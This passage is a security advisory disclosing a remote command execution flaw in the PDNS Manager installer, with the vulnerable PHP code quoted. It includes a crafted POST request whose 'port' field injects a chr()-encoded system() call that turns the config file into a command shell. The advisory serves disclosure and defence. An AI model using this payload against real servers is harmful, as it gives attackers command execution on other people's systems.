Advisory: Remote Command Execution in PDNS Manager RedTeam Pentesting discovered that PDNS Manager is vulnerable to a remote command execution vulnerability, if for any reason the configuration file config/config-user.php does not exist. Details ======= Product: PDNS Manager Affected Versions: Git master 3bf4e28 (2016-12-12) - 2bb00ea (2017-05-22) Fixed Versions: <= v1.2.1, >= Git Commit ccc4232 Vulnerability Type: Remote Command Execution Security Risk: medium Vendor URL: https://pdnsmanager.lmitsystems.de/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-011 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ "PDNS Manager is a simple yet powerful administration tool for the Powerdns authoritative nameserver." "PNDS Manager was developed from scratch to achieve a user-friendly and pretty looking interface." (from project website) [0] More Details ============ PDNS Manager includes two files used for installation purposes, install.php and api/install.php. The documentation tells users to start the installation by navigating to install.php and filling out the form that is presented there to create a database connection and an admin account. When submitted, an HTTP POST request with the configuration data is sent to api/install.php. The data is first validated in api/install.php by using it to connect to the database: ------------------------------------------------------------------------ try { $db = new PDO("$input->type:dbname=$input->database;host=$input->host;port=$input->port", $input->user, $input->password); } catch (PDOException $e) { $retval['status'] = "error"; $retval['message'] = serialize($e); } ------------------------------------------------------------------------ As long as a valid database connection can be made with the data from the POST request, the installation process continues. The configuration is written to the file config/config-user.php which then gets included from config/config-default.php: ------------------------------------------------------------------------ $configFile = Array(); $configFile[] = 'host)."';"; $configFile[] = '$config[\'db_user\']=\''.addslashes($input->user)."';"; $configFile[] = '$config[\'db_password\']= \''.addslashes($input->password)."';"; $configFile[] = '$config[\'db_name\']=\''.addslashes($input->database)."';"; $configFile[] = '$config[\'db_port\']='.addslashes($input->port).";"; $configFile[] = '$config[\'db_type\']=\''.addslashes($input->type)."';"; $retval['status'] = "success"; try { file_put_contents("../config/config-user.php", implode("\n", $configFile)); } ------------------------------------------------------------------------ At the very beginning of install.php, it is checked whether the file config/config-user.php already exists. If this is the case, further execution of the installation process is aborted: ------------------------------------------------------------------------ if(file_exists("../config/config-user.php")) { echo "Permission denied!"; exit(); } ------------------------------------------------------------------------ However, the installation files are not removed and can therefore still be accessed. In consequence, attackers can (re-)run the installation process as long as the file config/config-user.php does not exist. This can be the case if either the installation routine was indeed not yet run, or the configuration details were added manually, e.g. by entering them directly into the file config/config-default.php. The provided configuration data is not verified for semantic or syntactic correctness in any way. Only the PHP function addslashes() is used for all inputs, to mask single quotes, double quotes and backslashes. While this prevents adding malicious input to the configuration values which are set in single quotes, the port, which is expected to be numeric, is not enclosed in single quotes, making it vulnerable to code injection. Therefore, an HTTP POST request with a manipulated port value like the following could be sent to the installer: ------------------------------------------------------------------------ POST /api/install.php HTTP/1.1 Host: example.com [...] Connection: close { "host":"attacker-system.example.com", "user":"root", "password":"secret", "database":"pdnsdb", "port":"3306;system($_GET[chr(99).chr(109).chr(100)])", "userName":"administrator", "userPassword":"password", "type":"mysql" } ------------------------------------------------------------------------ To bypass the problem that the addslashes() function prevents the usage of single or double quotes for the GET variable name, it was instead encoded with the chr() function and decodes to the string "cmd". PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the PHP PDO class for establishing a database connection. Since the PDO class is quite liberal in what it accepts in its Data Source Name parameter, the configuration parameters as shown above are accepted and allow for a valid database connection, as the additional data in the "port" parameter is ignored by the PDO class. Finally, the file config/config-user.php will be written with the following content: ------------------------------------------------------------------------